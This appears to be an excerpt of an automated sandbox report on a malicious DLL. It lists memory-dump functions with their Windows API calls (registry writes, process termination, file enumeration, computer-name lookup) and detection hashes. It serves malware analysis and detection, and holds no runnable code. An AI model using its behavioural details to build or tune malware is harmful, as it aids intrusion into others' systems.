                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                • String ID: s:
                • API String ID: 2960378068-2363032815
                • Opcode ID: d07c77e0c946533be0c04fef5c3be672d1ddc7a811dd4d90d2e4edecc464b305
                • Instruction ID: a6b5740dc58eec3b7da7e2add734887811935d0272e1aca4d79945b2d031a4ac
                • Opcode Fuzzy Hash: d07c77e0c946533be0c04fef5c3be672d1ddc7a811dd4d90d2e4edecc464b305
                • Instruction Fuzzy Hash: 5A314176900205AFEB10EFEACD84FAE7BFCEB18304F040469E515E7241F774AA048B61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEnterCriticalSection.NTDLL(00000000), ref: 046D23FF
                • lstrcmpiW.KERNEL32(00000000,?,74E5F710,?,?,?,046C1626), ref: 046D2437
                • lstrcmpiW.KERNEL32(?,?,?,?,?,046C1626), ref: 046D244C
                • lstrlenW.KERNEL32(?,?,?,?,046C1626), ref: 046D2453
                • CloseHandle.KERNEL32(?,?,?,?,046C1626), ref: 046D247B
                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,046C1626), ref: 046D24A7
                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 046D24C5
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                • String ID:
                • API String ID: 1496873005-0
                • Opcode ID: 6fe52733937032c9e065a54311710db192be25017454df2315768edbd97ac77c
                • Instruction ID: ff8075d437778c40eebc0945cd4be66e840dea882d754375f63ea3726ed00f21
                • Opcode Fuzzy Hash: 6fe52733937032c9e065a54311710db192be25017454df2315768edbd97ac77c
                • Instruction Fuzzy Hash: B3213D71900306AFEB10AFA6DD98EAE77ECEF14644B045469E806E7211F739E9058B70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(046E42B9,00000000,046EE4A0,046EE4C0,?,?,046E42B9,046D26E1,046EE4A0), ref: 046DB665
                • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 046DB67B
                • lstrlen.KERNEL32(046D26E1,?,?,046E42B9,046D26E1,046EE4A0), ref: 046DB683
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 046DB68F
                • lstrcpy.KERNEL32(046EE4A0,046E42B9), ref: 046DB6A5
                • HeapFree.KERNEL32(00000000,00000000,?,?,046E42B9,046D26E1,046EE4A0), ref: 046DB6F9
                • HeapFree.KERNEL32(00000000,046EE4A0,?,?,046E42B9,046D26E1,046EE4A0), ref: 046DB708
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreelstrlen$lstrcpy
                • String ID:
                • API String ID: 1531811622-0
                • Opcode ID: 47576a5a67a14160a38a662ac08541ec225857e348208a5c0f75dc7e46d0fb8d
                • Instruction ID: 02308f8f163d5db0477ae7bb1048f67df751e9549747a19f0bdde25dea29ecf0
                • Opcode Fuzzy Hash: 47576a5a67a14160a38a662ac08541ec225857e348208a5c0f75dc7e46d0fb8d
                • Instruction Fuzzy Hash: 67213731A04284AFEB229F26DC44F6A7FAAEB95B00F054068E8449B214E776BC15CB70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D66
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D7F
                  • Part of subcall function 046D0D54: GetCurrentThreadId.KERNEL32 ref: 046D0D8C
                  • Part of subcall function 046D0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D98
                  • Part of subcall function 046D0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0DA6
                  • Part of subcall function 046D0D54: lstrcpy.KERNEL32(00000000), ref: 046D0DC8
                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,046C87AD,?), ref: 046CB10E
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,046C87AD,?,00000000,?,00000000,?,?), ref: 046CB181
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                • String ID:
                • API String ID: 2078930461-0
                • Opcode ID: 7ac5521e393bb684dbdfa52c3259f02be011052e13c201d30c865f94f7cb5545
                • Instruction ID: 7fbd51eaf5326347335708821d959e3f2cdc56e188a587fa2bce89aeb4ef7b61
                • Opcode Fuzzy Hash: 7ac5521e393bb684dbdfa52c3259f02be011052e13c201d30c865f94f7cb5545
                • Instruction Fuzzy Hash: 8A11EF31240314BBE3326B22EC89F7B3E9CEB45B65F001229F601AB590F6666C54C7B0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C45AA: lstrlen.KERNEL32(00000000,00000000,7691C740,74E481D0,?,?,?,046C64BB,?,00000000,74E481D0,?,?,046D09CA,00000000,04C9C0E0), ref: 046C4611
                  • Part of subcall function 046C45AA: sprintf.NTDLL ref: 046C4632
                • lstrlen.KERNEL32(00000000,7691C740,?,00000000,74E481D0,?,?,046D09CA,00000000,04C9C0E0), ref: 046C64CD
                • lstrlen.KERNEL32(?,?,?,046D09CA,00000000,04C9C0E0), ref: 046C64D5
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • strcpy.NTDLL ref: 046C64EC
                • lstrcat.KERNEL32(00000000,?), ref: 046C64F7
                  • Part of subcall function 046D4E2F: lstrlen.KERNEL32(?,?,?,00000000,?,046C6506,00000000,?,?,?,046D09CA,00000000,04C9C0E0), ref: 046D4E40
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046D09CA,00000000,04C9C0E0), ref: 046C6514
                  • Part of subcall function 046D91FF: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,046C6520,00000000,?,?,046D09CA,00000000,04C9C0E0), ref: 046D9209
                  • Part of subcall function 046D91FF: _snprintf.NTDLL ref: 046D9267
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                • String ID: =
                • API String ID: 2864389247-1428090586
                • Opcode ID: b0cde25fad8bd58978e46f4867f09acd4c66c3eb3bbef5b9314f65e5c6b355d3
                • Instruction ID: 884cf471b1e778a144a4f1b62529c4a9bd9717364252fb85caecb1159e0308bc
                • Opcode Fuzzy Hash: b0cde25fad8bd58978e46f4867f09acd4c66c3eb3bbef5b9314f65e5c6b355d3
                • Instruction Fuzzy Hash: A311A333901625BB97127BA59C88CBF369DDE99658315001DF901AB204FEB8FE0157F8
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SwitchToThread.KERNEL32(?,?,046CE039), ref: 046C65AF
                • CloseHandle.KERNEL32(?,?,046CE039), ref: 046C65BB
                • CloseHandle.KERNEL32(00000000,74E5F720,?,046C6113,00000000,?,?,?,046CE039), ref: 046C65CD
                • memset.NTDLL ref: 046C65E4
                • memset.NTDLL ref: 046C65FB
                • memset.NTDLL ref: 046C6612
                • memset.NTDLL ref: 046C6629
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memset$CloseHandle$SwitchThread
                • String ID:
                • API String ID: 3699883640-0
                • Opcode ID: 9f57a5ecd01cdf3d150bd9cc1017ab318472a018ab975c2788e44bfd90f14359
                • Instruction ID: 102b9d13cc2baef66f2c7fb48bc06962f2516bbf33d557aa164126fc8db81e05
                • Opcode Fuzzy Hash: 9f57a5ecd01cdf3d150bd9cc1017ab318472a018ab975c2788e44bfd90f14359
                • Instruction Fuzzy Hash: D51182319426207BE6217B27DC08D6B7AECEFA6714B44103DF104AB545FA6ABD0486ED
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D4FEF
                • wcstombs.NTDLL ref: 046D5000
                  • Part of subcall function 046CFF8B: StrChrA.SHLWAPI(046EE21C,0000002E,00000000,00000000,?,046EE21C,046D739D,00000000,00000000,00000000), ref: 046CFF9D
                  • Part of subcall function 046CFF8B: StrChrA.SHLWAPI(00000004,00000020,?,046EE21C,046D739D,00000000,00000000,00000000), ref: 046CFFAC
                • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 046D5021
                • TerminateProcess.KERNEL32(00000000,00000000), ref: 046D5030
                • CloseHandle.KERNEL32(00000000), ref: 046D5037
                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 046D5046
                • WaitForSingleObject.KERNEL32(00000000), ref: 046D5056
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                • String ID:
                • API String ID: 417118235-0
                • Opcode ID: f6f44b79bf67a8e42368e1f8141dd6c09edc9142bdf5bc16c091bb29ce054b30
                • Instruction ID: a304c9f0c365cfa5af86160086cc9d3e3ea221053dd25214c5dd40b2c47413f7
                • Opcode Fuzzy Hash: f6f44b79bf67a8e42368e1f8141dd6c09edc9142bdf5bc16c091bb29ce054b30
                • Instruction Fuzzy Hash: 7B11BF31500615BBE720AF56DC48FAA7BA8FB14751F141010FA05AB680F7BAAD94CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(046D26E1,00000000,00000000,046EE4C0,?,?,046E42C8,046D26E1,00000000,046D26E1,046EE4A0), ref: 046D278F
                • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 046D279D
                • wsprintfA.USER32 ref: 046D27B9
                • RegCreateKeyA.ADVAPI32(80000001,046EE4A0,00000000), ref: 046D27D1
                • lstrlen.KERNEL32(?), ref: 046D27E0
                • RegCloseKey.ADVAPI32(?), ref: 046D27F9
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D2808
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heaplstrlen$AllocateCloseCreateFreewsprintf
                • String ID:
                • API String ID: 3908752696-0
                • Opcode ID: 9a53bfa3b6123bd2854ca54025b5f7a2f48e15935798d8b8abbec4961479d95f
                • Instruction ID: 364bb4e643c21ed4dd31d452387a473a5dfd38ec0493cea952fbdb401bdbca2b
                • Opcode Fuzzy Hash: 9a53bfa3b6123bd2854ca54025b5f7a2f48e15935798d8b8abbec4961479d95f
                • Instruction Fuzzy Hash: 92116D72600209FFEB115F96EC88EAA3BBDEB44714F101021FA049A150FB769D549B60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleA.KERNEL32(?,?,?,?,?,046C1DC6,00000000), ref: 046CAEE6
                • GetProcAddress.KERNEL32(00000000,?), ref: 046CAEFF
                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,046C1DC6,00000000), ref: 046CAF1C
                • IsWow64Process.KERNEL32(?,?,?,?,?,?,046C1DC6,00000000), ref: 046CAF2D
                • CloseHandle.KERNEL32(?,?,?,?,046C1DC6,00000000), ref: 046CAF40
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HandleProcess$AddressCloseModuleOpenProcWow64
                • String ID: PWt
                • API String ID: 4157061983-1902262044
                • Opcode ID: c7bc4a396301c4781561c162a2e6d70701fbd77e9b5f67d324d2bc2b36eec4b0
                • Instruction ID: 2a88662fae58f15298a8f98251700fcf94d93fa72b0d21712d2d5da16b83ae93
                • Opcode Fuzzy Hash: c7bc4a396301c4781561c162a2e6d70701fbd77e9b5f67d324d2bc2b36eec4b0
                • Instruction Fuzzy Hash: 1F0192B190020AEFCB21DFA6D948DAE7BF8FB94341710865AF405DB201F736AE01CB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • wsprintfA.USER32 ref: 046DD33A
                • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 046DD34C
                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 046DD376
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 046DD389
                • CloseHandle.KERNEL32(?), ref: 046DD392
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                • String ID: 0x%08X
                • API String ID: 603522830-3182613153
                • Opcode ID: 7f12f85373bc361879db6a2293658b2043499ecc561802522798cad709954d41
                • Instruction ID: f67c8ba4cfcc3ce97419f245f703a2731b3c4b6f354fe26bf90d9004244849c9
                • Opcode Fuzzy Hash: 7f12f85373bc361879db6a2293658b2043499ecc561802522798cad709954d41
                • Instruction Fuzzy Hash: 74011E71901219BBDB10AB95DC0DDEFBFBCEF45350B004219E515E7185E778AA01CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • GetLastError.KERNEL32(?,?,?,00001000), ref: 046C4329
                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 046C43AE
                • CloseHandle.KERNEL32(00000000), ref: 046C43C8
                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 046C43FD
                  • Part of subcall function 046C5788: RtlReAllocateHeap.NTDLL(00000000,?,?,046C7DB7), ref: 046C5798
                • WaitForSingleObject.KERNEL32(?,00000064), ref: 046C447F
                • CloseHandle.KERNEL32(?), ref: 046C44A6
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                • String ID:
                • API String ID: 3115907006-0
                • Opcode ID: 7771812fbf212e78344b50d5ce11f6b9cc27b27c7e28bca2b3feb80421beb88f
                • Instruction ID: ae0aedd2c9609818e9193e858862545abc64dab0539abd9fa4c8989e30336cd2
                • Opcode Fuzzy Hash: 7771812fbf212e78344b50d5ce11f6b9cc27b27c7e28bca2b3feb80421beb88f
                • Instruction Fuzzy Hash: 7D814771E00219EFDB10DF95C894AADBBB5FF48344F248459E909AB250EB34BE41CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • FileTimeToLocalFileTime.KERNEL32(00000000,046C8A58), ref: 046C5940
                • FileTimeToSystemTime.KERNEL32(046C8A58,?), ref: 046C594E
                • lstrlenW.KERNEL32(00000010), ref: 046C595E
                • lstrlenW.KERNEL32(00000218), ref: 046C596A
                • FileTimeToLocalFileTime.KERNEL32(00000008,046C8A58), ref: 046C5A57
                • FileTimeToSystemTime.KERNEL32(046C8A58,?), ref: 046C5A65
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                • String ID:
                • API String ID: 1122361434-0
                • Opcode ID: ffd2dd03fac9b8df5a268ff695b428951545e5b1153a50fbe8ef9b33ee23b209
                • Instruction ID: 1faf8168b450beb0b870e87eb1cdb03860d5c6d8aab6d7de419d27a46a7f1791
                • Opcode Fuzzy Hash: ffd2dd03fac9b8df5a268ff695b428951545e5b1153a50fbe8ef9b33ee23b209
                • Instruction Fuzzy Hash: 4C71FC71A0021AAFCB50DFA9C884AFEB7F8FB48304F14455AE546E7241F738EA45DB64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleA.KERNEL32(00000000,?), ref: 046CCC89
                • GetLastError.KERNEL32 ref: 046CCCAF
                • SetEvent.KERNEL32(00000000), ref: 046CCCC2
                • GetModuleHandleA.KERNEL32(00000000), ref: 046CCD0B
                • memset.NTDLL ref: 046CCD20
                • RtlExitUserThread.NTDLL(?), ref: 046CCD55
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                • String ID:
                • API String ID: 3978817377-0
                • Opcode ID: eff2b3d37333bf6fd6cafd0948857d888dd1e372c1310e66e7f94dda3adee9ca
                • Instruction ID: 8cd8c72134233786d6e01d5305d58d5dff6a1f99eab095094747f688f674f551
                • Opcode Fuzzy Hash: eff2b3d37333bf6fd6cafd0948857d888dd1e372c1310e66e7f94dda3adee9ca
                • Instruction Fuzzy Hash: D4415BB1900604AFDB209FA9CD8887ABBFDEF95711724455EE90AE7240F735BD41DB20
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlImageNtHeader.NTDLL(?), ref: 046D7106
                  • Part of subcall function 046E2E6E: lstrlenW.KERNEL32(00000000,00000000,00000094,?,00000000,?,?,046D7126,?), ref: 046E2E9A
                  • Part of subcall function 046E2E6E: RtlAllocateHeap.NTDLL(00000000,?), ref: 046E2EAC
                  • Part of subcall function 046E2E6E: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,046D7126,?), ref: 046E2EC9
                  • Part of subcall function 046E2E6E: lstrlenW.KERNEL32(00000000,?,?,046D7126,?), ref: 046E2ED5
                  • Part of subcall function 046E2E6E: HeapFree.KERNEL32(00000000,00000000,?,?,046D7126,?), ref: 046E2EE9
                • RtlEnterCriticalSection.NTDLL(00000000), ref: 046D713E
                • CloseHandle.KERNEL32(?), ref: 046D714C
                • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 046D721E
                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 046D722D
                • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 046D7240
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                • String ID:
                • API String ID: 1719504581-0
                • Opcode ID: f32a107b92dfa926ef016a75a2c99e9fa7e9bedbc19999e30c582bfed28f77ab
                • Instruction ID: c8194655566d55aa8c192d19cd437ad53a00128583d638547309755fdd66c07c
                • Opcode Fuzzy Hash: f32a107b92dfa926ef016a75a2c99e9fa7e9bedbc19999e30c582bfed28f77ab
                • Instruction Fuzzy Hash: 8041C131A00609EBDB219F95DC84BAA7BF9FB58705F040129F504AB210FB75FE45DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e4a411b4fcd58a480b6389b15f45659f52fa9de9a567f759fc46935c0729cee8
                • Instruction ID: cfc85f6d88bef5ed690c599e5f0fdc4546cee98e9554c794da78f930235b1142
                • Opcode Fuzzy Hash: e4a411b4fcd58a480b6389b15f45659f52fa9de9a567f759fc46935c0729cee8
                • Instruction Fuzzy Hash: 2841D471500705DFD730AF69888496BB7E9FB89364B004A2EF1AAC76C0F770E8018B50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,046DDB18,?,?,00000000,046CC692,?,?,?,?,00000000,?), ref: 046C1B99
                  • Part of subcall function 046C1B8A: mbstowcs.NTDLL ref: 046C1BB5
                • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046D5AA7
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 046DD3E9
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046DD3F5
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD43D
                  • Part of subcall function 046DD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD458
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(0000002C), ref: 046DD490
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?), ref: 046DD498
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD4BB
                  • Part of subcall function 046DD39D: wcscpy.NTDLL ref: 046DD4CD
                • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 046D5AC8
                • lstrlenW.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046D5AF2
                  • Part of subcall function 046DD39D: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 046DD4F3
                  • Part of subcall function 046DD39D: RtlEnterCriticalSection.NTDLL(?), ref: 046DD528
                  • Part of subcall function 046DD39D: RtlLeaveCriticalSection.NTDLL(?), ref: 046DD544
                  • Part of subcall function 046DD39D: FindNextFileW.KERNEL32(?,00000000), ref: 046DD55D
                  • Part of subcall function 046DD39D: WaitForSingleObject.KERNEL32(00000000), ref: 046DD56F
                  • Part of subcall function 046DD39D: FindClose.KERNEL32(?), ref: 046DD584
                  • Part of subcall function 046DD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD598
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(0000002C), ref: 046DD5BA
                • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 046D5B0F
                • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 046D5B26
                • PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046D5B3B
                  • Part of subcall function 046D42D2: lstrlenW.KERNEL32(00000000,?,00000002,00000000,?,?,?,046D5B52,?,0000001E,?), ref: 046D42E7
                  • Part of subcall function 046D42D2: lstrlenW.KERNEL32(00000000,?,?,?,046D5B52,?,0000001E,?), ref: 046D42EF
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                • String ID:
                • API String ID: 2670873185-0
                • Opcode ID: 44cacba63d725a3010eb0ba44e1d783d9372a5bf7655e174d82e4a50ef124a27
                • Instruction ID: 294ba84cb72a45d3f4dacf9d666bbd2bdd9bc05f93d1358ef32c48015c9ef10a
                • Opcode Fuzzy Hash: 44cacba63d725a3010eb0ba44e1d783d9372a5bf7655e174d82e4a50ef124a27
                • Instruction Fuzzy Hash: 9E315A71804306EFD710AF65C884C6BBBE9FF98258B04092EF48697220F735ED158BA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D74EA
                • HeapFree.KERNEL32(00000000,046ED06E,?,?,046C906C,?,046ED06E,?,?,?,?), ref: 046D7520
                • GetComputerNameW.KERNEL32(00000000,?), ref: 046D752E
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D7545
                • GetComputerNameW.KERNEL32(00000000,?), ref: 046D7556
                • HeapFree.KERNEL32(00000000,00000000,?,?,046C906C,?,046ED06E,?,?,?,?), ref: 046D757C
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateComputerFreeName
                • String ID:
                • API String ID: 3439771632-0
                • Opcode ID: 65b2c36d720876d59ec14109413add4faad6caf5f0288c2dd2ecb805bb401f1c
                • Instruction ID: 007f4e659ce085c71f52cab8d48958882ebe3e818b8503c2ee3cb15f3b6ab5eb
                • Opcode Fuzzy Hash: 65b2c36d720876d59ec14109413add4faad6caf5f0288c2dd2ecb805bb401f1c
                • Instruction Fuzzy Hash: 7C31EAB6E00209EFDB10EFA6DD848AEBBF9FB44204B109469E405D7600EB34EE559F61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(?), ref: 046C3DBE
                • lstrlen.KERNEL32(?), ref: 046C3DD4
                • lstrlen.KERNEL32(?), ref: 046C3DE9
                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 046C3E4E
                • _snprintf.NTDLL ref: 046C3E74
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 046C3E93
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFree_snprintf
                • String ID:
                • API String ID: 3180502281-0
                • Opcode ID: b0ac16e479d19dca17b78e08de813b20dbb355f7ce8c0432ffc4841bfd4cebcd
                • Instruction ID: 25352dcd67ea8c6c7729ff92984f6ad10a2f501b732fcf05df8bc67e32511a4d
                • Opcode Fuzzy Hash: b0ac16e479d19dca17b78e08de813b20dbb355f7ce8c0432ffc4841bfd4cebcd
                • Instruction Fuzzy Hash: F5316172910259FFDB11EF66DC448AB7BAAFB44344B01942AFC05AB200F732AD50DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 046D5FBC
                • CreateWaitableTimerA.KERNEL32(046EE268,00000003,?), ref: 046D5FD9
                • GetLastError.KERNEL32(?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046D5FEA
                  • Part of subcall function 046CBC31: RegQueryValueExA.KERNELBASE(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,00000003,00000000,?,00000000,?,046DE5BD,046DE5BD,?,046D6019,00000000), ref: 046CBC69
                  • Part of subcall function 046CBC31: RtlAllocateHeap.NTDLL(00000000,046D6019), ref: 046CBC7D
                  • Part of subcall function 046CBC31: RegQueryValueExA.ADVAPI32(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046CBC97
